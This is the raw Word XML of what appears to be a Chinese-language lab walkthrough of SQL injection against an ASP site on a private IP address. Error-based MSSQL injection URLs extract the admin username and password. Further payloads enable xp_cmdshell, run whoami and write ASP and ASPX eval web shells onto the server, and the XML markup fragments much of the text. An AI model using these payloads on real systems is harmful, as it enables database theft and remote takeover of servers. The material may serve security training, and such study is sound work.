      <w:r w:rsidRPr="00F860EE">
        <w:t>otype</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F860EE">
        <w:t>=title&amp;submit2=%CB%D1%CB%F7</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26477517" w14:textId="70ABFC64" w:rsidR="00F860EE" w:rsidRDefault="00F860EE" w:rsidP="00BD5D6B">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="78B68149" wp14:editId="4356B6B4">
            <wp:extent cx="5274310" cy="2763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82D7" w14:textId="099CDDE4" w:rsidR="00F860EE" w:rsidRDefault="00F860EE" w:rsidP="00BD5D6B"/>
    <w:p w14:paraId="61F93563" w14:textId="4DE3F218" w:rsidR="00F860EE" w:rsidRDefault="00FF23DA" w:rsidP="00BD5D6B">
      <w:r w:rsidRPr="00FF23DA">
        <w:t xml:space="preserve">http://172.16.1.123/search.asp?key=11'and (select top 1 COLUMN_NAME from </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00FF23DA">
        <w:t>aa.information</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00FF23DA">
        <w:t>_schema.columns</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00FF23DA">
        <w:t xml:space="preserve"> where TABLE_NAME='Admin' and COLUMN_NAME not in('</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00FF23DA">
        <w:t>ID','admin','password</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00FF23DA">
        <w:t>'))&gt;0--+&amp;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00FF23DA">
        <w:t>otype</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00FF23DA">
        <w:t>=title&amp;submit2=%CB%D1%CB%F7</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CCB6F5E" w14:textId="0145E9D5" w:rsidR="00272EE5" w:rsidRDefault="00272EE5" w:rsidP="00BD5D6B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="72284307" wp14:editId="7319AD7B">
            <wp:extent cx="5274310" cy="27666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EC9D" w14:textId="3B214A36" w:rsidR="00D170AC" w:rsidRDefault="00D170AC" w:rsidP="00BD5D6B"/>
    <w:p w14:paraId="4561B3A5" w14:textId="16581177" w:rsidR="00272EE5" w:rsidRDefault="00272EE5" w:rsidP="00BD5D6B">
      <w:r w:rsidRPr="00272EE5">
        <w:t>http://172.16.1.123/search.asp?key=11'and (select top 1 admin from Admin)&gt;0--+&amp;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00272EE5">
        <w:t>otype</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00272EE5">
        <w:t>=title&amp;submit2=%CB%D1%CB%F7</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BA2C764" w14:textId="2535FADE" w:rsidR="00272EE5" w:rsidRDefault="00272EE5" w:rsidP="00BD5D6B">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4BEA5D43" wp14:editId="3C8A6AF5">
            <wp:extent cx="5274310" cy="2726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E387" w14:textId="2D3E64EA" w:rsidR="00272EE5" w:rsidRDefault="00272EE5" w:rsidP="00BD5D6B"/>
    <w:p w14:paraId="4DB22DEA" w14:textId="0EE3ADA6" w:rsidR="00272EE5" w:rsidRDefault="00272EE5" w:rsidP="00BD5D6B">
      <w:r w:rsidRPr="00272EE5">
        <w:t>http://172.16.1.123/search.asp?key=11'and (select top 1 password from Admin)&gt;0--+&amp;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00272EE5">
        <w:t>otype</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00272EE5">
        <w:t>=title&amp;submit2=%CB%D1%CB%F7</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F896A15" w14:textId="73F695AA" w:rsidR="00272EE5" w:rsidRDefault="00272EE5" w:rsidP="00BD5D6B">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7D168CD9" wp14:editId="0B8E7A4D">
            <wp:extent cx="5274310" cy="26339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95B7" w14:textId="6B7D9ED7" w:rsidR="00272EE5" w:rsidRDefault="00272EE5" w:rsidP="00BD5D6B">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>获得用户为</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00A916BA">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>oyaya</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00A916BA">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00A916BA">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>密码为1</w:t>
      </w:r>
      <w:r w:rsidR="00A916BA">
        <w:t>23456</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C917E89" w14:textId="21094E02" w:rsidR="00272EE5" w:rsidRDefault="00272EE5" w:rsidP="00BD5D6B"/>
    <w:p w14:paraId="7D026CFA" w14:textId="5C110608" w:rsidR="0043794C" w:rsidRDefault="0043794C" w:rsidP="00BD5D6B">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>通过手工或者扫描器扫描后台</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1421580C" w14:textId="2776CD64" w:rsidR="0043794C" w:rsidRDefault="0043794C" w:rsidP="00BD5D6B">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>http</w:t>
      </w:r>
      <w:r>
        <w:t>://172.16.1.123/admin/index.asp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="496636F7" w14:textId="77777777" w:rsidR="0043794C" w:rsidRDefault="0043794C" w:rsidP="00BD5D6B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="29576B17" w14:textId="4872D0AE" w:rsidR="0043794C" w:rsidRDefault="0043794C" w:rsidP="00BD5D6B">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5A750643" wp14:editId="4F89D85C">
            <wp:extent cx="5274310" cy="3909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A4D" w14:textId="10B0AA0B" w:rsidR="009E1DA7" w:rsidRDefault="009E1DA7" w:rsidP="00BD5D6B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">获得后台服务器文件的绝对路径 </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>c</w:t>
      </w:r>
      <w:r>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidR="00396BB0">
        <w:t>\oyaya\admin\admin</w:t>
      </w:r>
      <w:r w:rsidR="00396BB0">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>_</w:t>
      </w:r>
      <w:r w:rsidR="00396BB0">
        <w:t>main.asp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B068B35" w14:textId="45176C2F" w:rsidR="006E2FF0" w:rsidRDefault="006E2FF0" w:rsidP="00BD5D6B"/>
    <w:p w14:paraId="2E9E31B3" w14:textId="469BF4F7" w:rsidR="006E2FF0" w:rsidRDefault="00F051BB" w:rsidP="00BD5D6B">
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>;exec</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> master..</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>xp_cmdshell</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> 'echo "&lt;%@ LANGUAGE=VBSCRIPT %&gt;;&lt;%eval request(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>chr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">(35))%&gt;''" &gt; </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>c</w:t>
      </w:r>
      <w:r>
        <w:t>:\oyaya\admin\2.asp'</w:t>
      </w:r>
      <w:r w:rsidR="00011FDA">
        <w:t>—</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58FD07F6" w14:textId="681179C6" w:rsidR="00011FDA" w:rsidRDefault="00011FDA" w:rsidP="00BD5D6B"/>
    <w:p w14:paraId="01799D2A" w14:textId="203FB350" w:rsidR="00011FDA" w:rsidRDefault="00011FDA" w:rsidP="00BD5D6B">
      <w:r>
        <w:t>';exec master..</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>xp_cmdshell</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> 'echo "&lt;%@ LANGUAGE=Jscript %&gt;;&lt;%eval(Request("sb"),"unsafe")%&gt;''" &gt;</w:t>
      </w:r>
      <w:hyperlink r:id="rId23" w:tgtFrame="_blank" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="a5"/>
          </w:rPr>
          <w:t>C:</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t>\inetpub\wwwroot\</w:t>
      </w:r>
      <w:r w:rsidR="00C64778">
        <w:t>4444</w:t>
      </w:r>
      <w:r>
        <w:t>.aspx'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46CED56F" w14:textId="07DEE735" w:rsidR="006A6BC8" w:rsidRDefault="006A6BC8" w:rsidP="00BD5D6B"/>
    <w:p w14:paraId="0D58949A" w14:textId="4AB8A212" w:rsidR="006A6BC8" w:rsidRDefault="00FB727B" w:rsidP="00BD5D6B">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>开启</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>xp_cmd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="282E766A" w14:textId="387AF3DB" w:rsidR="00FB727B" w:rsidRDefault="00FB727B" w:rsidP="00BD5D6B">
      <w:r w:rsidRPr="00FB727B">
        <w:t xml:space="preserve">http://172.16.1.123/search.asp?key=11';EXEC </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00FB727B">
        <w:t>sp_configure</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00FB727B">
        <w:t xml:space="preserve"> 'show advanced options', </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00FB727B">
        <w:t>1;RECONFIGURE</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00FB727B">
        <w:t xml:space="preserve">;EXEC </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00FB727B">
        <w:t>sp_configure</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00FB727B">
        <w:t xml:space="preserve"> '</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00FB727B">
        <w:t>xp_cmdshell</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00FB727B">
        <w:t>', 1;RECONFIGURE;--</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FE9E6C8" w14:textId="77777777" w:rsidR="00FB727B" w:rsidRDefault="00FB727B" w:rsidP="00BD5D6B"/>
    <w:p w14:paraId="15E05898" w14:textId="5B181765" w:rsidR="006A6BC8" w:rsidRDefault="006A6BC8" w:rsidP="00BD5D6B">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>验证是否开启成功</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46467521" w14:textId="6A79B5B2" w:rsidR="006A6BC8" w:rsidRDefault="006A6BC8" w:rsidP="00BD5D6B">
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="006A6BC8">
        <w:t xml:space="preserve">http://172.16.1.123/search.asp?key=11';EXEC  </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006A6BC8">
        <w:t>xp</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="006A6BC8">
        <w:t>_cmdshell"whoami</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006A6BC8">
        <w:t>";--</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A3C64E0" w14:textId="59F6BED7" w:rsidR="00603E52" w:rsidRDefault="00603E52" w:rsidP="00BD5D6B"/>
    <w:p w14:paraId="56B60AE4" w14:textId="77777777" w:rsidR="00993478" w:rsidRDefault="00603E52" w:rsidP="00993478">
      <w:r w:rsidRPr="00FB727B">
        <w:t>http://172.16.1.123/search.asp?key=11'</w:t>
      </w:r>
      <w:r w:rsidR="00993478">
        <w:t xml:space="preserve">;exec </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="00993478">
        <w:t>master..</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="00993478">
        <w:t>xp_cmdshell</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00993478">
        <w:t xml:space="preserve"> 'echo "&lt;%@ LANGUAGE=VBSCRIPT %&gt;;&lt;%eval request(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00993478">
        <w:t>chr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00993478">
        <w:t xml:space="preserve">(35))%&gt;''" &gt; </w:t>
      </w:r>
      <w:r w:rsidR="00993478">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>c</w:t>
      </w:r>
      <w:r w:rsidR="00993478">
        <w:t>:\oyaya\admin\2.asp'—</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A04134C" w14:textId="4D6552AF" w:rsidR="00603E52" w:rsidRDefault="00603E52" w:rsidP="00BD5D6B"/>
    <w:p w14:paraId="4321EEF2" w14:textId="07D89EEC" w:rsidR="00146A07" w:rsidRDefault="00146A07" w:rsidP="00BD5D6B"/>
    <w:p w14:paraId="1C557185" w14:textId="2AA8D837" w:rsidR="00146A07" w:rsidRPr="00993478" w:rsidRDefault="00146A07" w:rsidP="00BD5D6B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>参考文档：</w:t>
      </w:r>
      <w:r w:rsidRPr="00146A07">
        <w:t>https://blog.csdn.net/niex</w:t>
      </w:r>
      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="0"/>
      <w:r w:rsidRPr="00146A07">
        <w:t>inming/article/details/49055609</w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="00146A07" w:rsidRPr="00993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A"/>
    <w:rsid w:val="00011FDA"/>
    <w:rsid w:val="00083D90"/>
    <w:rsid w:val="00146A07"/>
    <w:rsid w:val="0016601D"/>
    <w:rsid w:val="001756B6"/>
    <w:rsid w:val="001B61E8"/>
    <w:rsid w:val="001D046D"/>
    <w:rsid w:val="00272EE5"/>
    <w:rsid w:val="002755CA"/>
    <w:rsid w:val="002A3927"/>
    <w:rsid w:val="002D1BFA"/>
    <w:rsid w:val="002E50A2"/>
    <w:rsid w:val="002E7584"/>
    <w:rsid w:val="0030114B"/>
    <w:rsid w:val="00332D59"/>
    <w:rsid w:val="00396BB0"/>
    <w:rsid w:val="00423CAB"/>
    <w:rsid w:val="0043794C"/>
    <w:rsid w:val="00482F02"/>
    <w:rsid w:val="004F04CB"/>
    <w:rsid w:val="004F536E"/>
    <w:rsid w:val="005F0FCD"/>
    <w:rsid w:val="00603E52"/>
    <w:rsid w:val="006A6BC8"/>
    <w:rsid w:val="006E2FF0"/>
    <w:rsid w:val="008222D4"/>
    <w:rsid w:val="00851388"/>
    <w:rsid w:val="008D0055"/>
    <w:rsid w:val="00945D3F"/>
    <w:rsid w:val="00993478"/>
    <w:rsid w:val="009E1DA7"/>
    <w:rsid w:val="00A916BA"/>
    <w:rsid w:val="00AF1532"/>
    <w:rsid w:val="00B4717E"/>
    <w:rsid w:val="00B93585"/>
    <w:rsid w:val="00BD5D6B"/>
    <w:rsid w:val="00C64778"/>
    <w:rsid w:val="00D170AC"/>
    <w:rsid w:val="00DB485A"/>
    <w:rsid w:val="00E05B4B"/>
    <w:rsid w:val="00E076BC"/>
    <w:rsid w:val="00EB6405"/>
    <w:rsid w:val="00F051BB"/>
    <w:rsid w:val="00F16B6C"/>
    <w:rsid w:val="00F46970"/>
    <w:rsid w:val="00F66102"/>
    <w:rsid w:val="00F860EE"/>
    <w:rsid w:val="00F9616B"/>
    <w:rsid w:val="00FB1B37"/>
    <w:rsid w:val="00FB727B"/>
    <w:rsid w:val="00FF23DA"/>
    <w:rsid w:val="00FF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913D5"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{C61F9A3C-7148-4F48-9489-8A7B13CF5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697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46970"/>
    <w:rPr>
      <w:sz w:val="18"/>
      <w:szCs w:val="18"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="a5">
    <w:name w:val="Hyperlink"/>
    <w:basedOn w:val="a0"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00F9616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961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16.1.123/search.asp?key=11%27%20and%20(SELECT%20top%201%20Name%20FROM%20Master..SysDatabases%20where%20name%20not%20in%20(%27master%27))%3E0--+&amp;otype=title&amp;submit2=%CB%D1%CB%F7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172.16.1.123/search.asp?key=11%27%20and%20db_name()%3E0--+-&amp;otype=title&amp;submit2=%CB%D1%CB%F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172.16.1.123/searc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hyperlink" Target="https://www.baidu.com/s?wd=C%3A&amp;tn=24004469_oem_dg&amp;rsv_dl=gh_pl_sl_cs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://172.16.1.123/search.asp?key=11%27%20and%201=convert(int,(select%20name%20from%20master.dbo.sysdatabases%20where%20dbid=7))----+&amp;otype=title&amp;submit2=%CB%D1%CB%F7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9</Pages>
  <Words>679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feng</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>ye feng</cp:lastModifiedBy>
  <cp:revision>18</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2019-03-18T10:51:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2019-03-19T01:01:00Z</dcterms:modified>
</cp:coreProperties>
</file>